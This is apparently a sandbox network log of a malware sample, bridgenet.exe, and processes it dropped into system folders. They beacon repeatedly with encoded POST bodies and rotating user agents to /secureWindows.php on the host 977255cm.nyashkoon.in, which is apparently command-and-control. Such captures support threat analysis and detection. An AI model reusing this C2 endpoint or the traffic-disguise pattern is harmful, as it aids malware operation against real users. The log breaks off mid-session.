Jan 13, 2025 13:33:16.357552052 CET	344	OUT	Data Raw: 00 02 04 03 03 08 01 05 05 06 02 01 02 03 01 0a 00 0b 05 00 02 02 03 0c 00 53 0d 53 04 02 02 01 0d 56 07 0c 03 00 06 07 0d 04 05 06 04 02 07 06 03 03 0f 09 0d 54 04 0b 07 02 04 0c 01 02 05 08 05 06 0d 5a 05 03 01 03 0e 04 0c 05 0f 0d 0c 53 07 57 Data Ascii: SSVTZSWU\L}Sk^jwbqOvK]ShoeMt\|t]Q^xoEzpXI}mhN`lN~u~V@zmP~\a
Jan 13, 2025 13:33:16.453470945 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:16.683933020 CET	1023	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izWYlmVeCo5V4nF55Uh4UZvn16mna64ngJKO8ksQ0TlS8JJ9fyPDsVs7N50T9nMsdAeclkcDWVlJzAY4NHyr5CUMNlH3MgtQoDP3LEabtHvlZNbmJq17KWb%2BVLA2E5jC1mrwrkIE3s8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901569ed8bb4727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8359&min_rtt=1965&rtt_var=13525&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=27485&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49917	104.21.112.1	80	3240	C:\Users\user\Desktop\bridgenet.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:33.927545071 CET	326	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:34.283857107 CET	344	OUT	Data Raw: 05 02 01 05 03 0a 01 0b 05 06 02 01 02 03 01 00 00 0b 05 0a 02 07 03 09 03 04 0a 06 07 00 02 08 0a 01 04 5b 02 53 05 02 0b 07 07 0a 05 07 07 06 05 05 0c 0d 0f 50 06 00 04 53 06 06 04 0b 06 0b 01 03 0f 0a 07 05 05 09 0b 00 0e 0f 0f 50 0c 04 04 02 Data Ascii: [SPSPTSU\L~A\|Yb`Liu\oU~\|r]w\|^cxKl\|wJ{Yb}}`tdpAiO~V@xCPO}Lu
Jan 13, 2025 13:33:34.367388964 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:34.617224932 CET	1035	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cim5UNlFbJNoifwDe%2FUseCS0HyCgo4rspA%2Bdat5AjI7tAmvcfbFIvGfZ%2Bax1IWi%2F0qtzBi5U2IqttpJa3Bp8C4kLoJiL3AqIod1%2Bsl%2Fjjx6EXZWqf%2FNJX3vuBke16PFHLapTlCAnWZs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156a5d8ca1c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2859&min_rtt=1447&rtt_var=3368&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=114527&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49962	104.21.112.1	80	4600	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:42.014729977 CET	326	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:42.394068956 CET	344	OUT	Data Raw: 00 04 04 06 06 01 04 02 05 06 02 01 02 03 01 0b 00 05 05 0b 02 0c 03 0c 00 04 0e 01 07 0e 06 05 0d 03 07 08 01 01 03 05 0e 0a 07 05 06 0a 05 0e 05 0a 0e 0b 0c 00 05 52 07 06 06 04 07 04 07 5f 03 01 0d 59 05 52 04 01 0e 07 0e 02 0d 04 0d 09 02 01 Data Ascii: R_YRT\L}Rk^Twb_Mvu^AhiwlcZol\|Y{piY}mcR`^h~u~V@z}nLra
Jan 13, 2025 13:33:42.479079962 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:42.718708992 CET	1029	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FerXsv46GKzGWWZAAx6HHy9roIQeWQVU7ELv60GnAa1FApAtKebKvrbYrCU7YzPGhzdn6tOQn1ekpzkkp7LmAfWFXHNZgsTXRkXDMJFoRSG99o%2FICIP%2FubYkHD3EOwZWigBBud%2FDixY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156a903f75424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2794&min_rtt=1580&rtt_var=3022&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=129226&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49975	104.21.112.1	80	1876	C:\Users\user\Desktop\bridgenet.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:46.420881033 CET	273	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:46.769224882 CET	344	OUT	Data Raw: 00 03 01 06 06 0c 04 01 05 06 02 01 02 07 01 04 00 03 05 0b 02 06 03 0f 07 05 0c 0d 04 04 03 52 0c 01 06 5b 02 57 07 06 0e 07 02 06 06 0b 02 05 04 06 0b 0d 0d 03 04 00 07 04 03 03 04 02 07 08 02 0a 0f 0a 07 04 05 07 0c 00 0f 00 0d 01 0f 05 05 03 Data Ascii: R[WZ\U\L}SkYu^w\aLb\`kUv^wU`hZlKlUKxp~CxvwhAie~V@A{CvL}\S
Jan 13, 2025 13:33:46.922472000 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:47.145268917 CET	1026	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiAAhwEzLlifB%2BXqkKPBL5rp%2B9Jhl8MfTqcvfUIi5gjV3nkBwCeLl2jnkaWsbxqtrCB1X9zMugRsxKal2qw4m%2BtvT6AisW95WuyLGWUcRphvEKLK8i85duYPbnBbeug%2Fleyyimdh9wY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156aabfa63c34f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2768&min_rtt=1589&rtt_var=2955&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=132414&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49976	104.21.112.1	80	2416	C:\Program Files\Internet Explorer\images\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:50.008907080 CET	273	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:50.362536907 CET	344	OUT	Data Raw: 00 04 01 01 06 0b 04 06 05 06 02 01 02 01 01 06 00 0b 05 00 02 06 03 01 00 0f 0d 56 04 57 02 50 0c 00 04 5a 03 05 05 07 0c 01 04 01 00 0b 04 06 07 04 0c 0d 0c 05 06 06 04 07 05 02 04 07 06 0c 03 04 0f 5e 07 51 05 00 0c 03 0e 55 0f 04 0e 53 04 54 Data Ascii: VWPZ^QUSTPRQ\L~k`fOt\iwftB\|vXwRxkZ\|{opZ{`jCZtg^}O~V@{mP}\[
Jan 13, 2025 13:33:50.458343029 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:50.678941965 CET	1025	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7AQDDi4I3YUg7ngmIyq%2F7O3rnU8H2M5zizJ6zbaZRyqQkZ5sGB%2BnT%2Bwk17AZfmaiMrWIldU9V7DowWwWAKLsOoCWUoOJToO3KGtGawsFhqFtCLqsPHkvh1Vii%2BsJW4ON5qkVkM2nupg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156ac21ed9424b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3560&min_rtt=1570&rtt_var=4569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=83466&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49978	104.21.112.1	80	6220	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:55.018521070 CET	309	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:55.377774000 CET	344	OUT	Data Raw: 00 01 01 05 06 00 04 07 05 06 02 01 02 02 01 02 00 04 05 09 02 00 03 0a 00 00 0f 07 07 07 00 05 0f 03 03 0a 07 06 07 03 0e 54 04 07 05 0a 04 07 03 03 0b 0b 0d 07 07 06 05 03 03 0c 05 52 05 0f 02 0a 0f 5c 06 05 05 07 0f 57 0f 0f 0c 0c 0f 00 06 0c Data Ascii: TR\WSU\L}ThYbNcqrYv[]R\|lWc\|o]hZtK{Bs{pf\|}`NwwZN}_~V@xmTN~ry
Jan 13, 2025 13:33:55.470283031 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:33:55.714998960 CET	1029	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:33:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FG%2Bmzh%2FA1FxAdPawT4lIX%2BmjDRmQMt4QLAesnDnPVrcpgLeMGsZd6B0%2Bi8ECtrHHKKm9UuRQNQDQ250COLax55bAeXULOtBy6LhpV0P6MQLpxi9d4qj1hMPbNeNxE8bW5WJ5S7Ki0tw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156ae16805424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1582&rtt_var=1110&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=399780&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49979	104.21.112.1	80	5480	C:\Users\user\Desktop\bridgenet.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:33:59.445557117 CET	308	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:33:59.799716949 CET	344	OUT	Data Raw: 00 03 01 07 03 0b 04 02 05 06 02 01 02 00 01 02 00 0b 05 0e 02 01 03 0e 02 00 0f 04 06 0f 06 03 0c 0f 03 08 02 53 05 01 0f 02 06 00 04 01 07 05 06 0b 0d 00 0d 0e 04 0a 07 01 07 0d 06 51 05 0b 00 56 0e 0f 04 56 04 06 0d 57 0b 02 0d 04 0b 08 07 0c Data Ascii: SQVVWRVU\L~s}_t[b\a[Zoj\tBk_kZcXxl]Eo`zJSRCvto^~e~V@xmP~bi
Jan 13, 2025 13:33:59.897567034 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:34:00.130917072 CET	1034	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:34:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfrpEDT9gYE5NAlmcBjPSkAMyyGMU8rcxWYm30WdUU30c%2FAsHAUrVYjzs%2F6yFb%2BEAuaZj8CMHMdxboEpf83j%2FRLzMPWIEFBy3AL%2BSg8hlOd33CGwg3X%2BE9f9KTRr2ckh9n3%2Bd8lWLg4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156afd1bcf43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3510&min_rtt=1575&rtt_var=4460&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=652&delivery_rate=85605&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49980	104.21.112.1	80	2728	C:\Program Files\Internet Explorer\images\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:34:16.713641882 CET	326	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:34:17.070949078 CET	344	OUT	Data Raw: 05 00 04 0d 03 08 04 05 05 06 02 01 02 03 01 04 00 0b 05 08 02 0d 03 08 02 04 0e 06 04 54 03 02 0e 0f 03 0f 01 00 06 51 0f 03 07 07 04 07 06 02 03 0a 0e 5d 0d 54 06 57 06 03 05 03 06 02 00 0a 03 0a 0c 0d 07 01 01 04 0e 05 0f 00 0d 57 0f 05 07 50 Data Ascii: TQ]TWWPWV\L~@k^y_tabYweR\|B~_t\|w^~ppll`[x`zK\|~`Awgo]i_~V@{CPAbq
Jan 13, 2025 13:34:17.160456896 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:34:17.400135040 CET	1031	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:34:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cDjmVkZA3IW4bYbiTATXX6%2FW6cWAG%2B35yY5MvfoNlwnngXsjX90%2BwcvCJGi08f3C%2BqrXcIVQdbITebhoB0gqkOZnpIDa6HhrqMjJtLdE4zVZweAmnWhwq57lI%2F7lLC5DTGwTDGeBEew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156b68fdb90f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1568&rtt_var=1345&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=317460&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.9	49981	104.21.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:34:24.636328936 CET	273	OUT	POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 977255cm.nyashkoon.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:34:24.988166094 CET	344	OUT	Data Raw: 05 00 04 06 03 0f 01 05 05 06 02 01 02 04 01 06 00 03 05 0e 02 03 03 0b 00 01 0a 01 04 53 03 04 0c 03 04 5e 02 51 07 0b 0c 57 05 04 00 04 07 01 06 06 0d 0c 0f 07 04 06 07 57 04 00 06 06 04 0e 00 53 0d 5a 00 07 06 06 0d 0f 0c 0e 0a 07 0c 02 06 0d Data Ascii: S^QWWSZU\L~s~NvamLuuh@\|lqtopM~`hJlUgz`zhmZwwQ_iO~V@@{mv~L}
Jan 13, 2025 13:34:25.079279900 CET	25	IN	HTTP/1.1 100 Continue
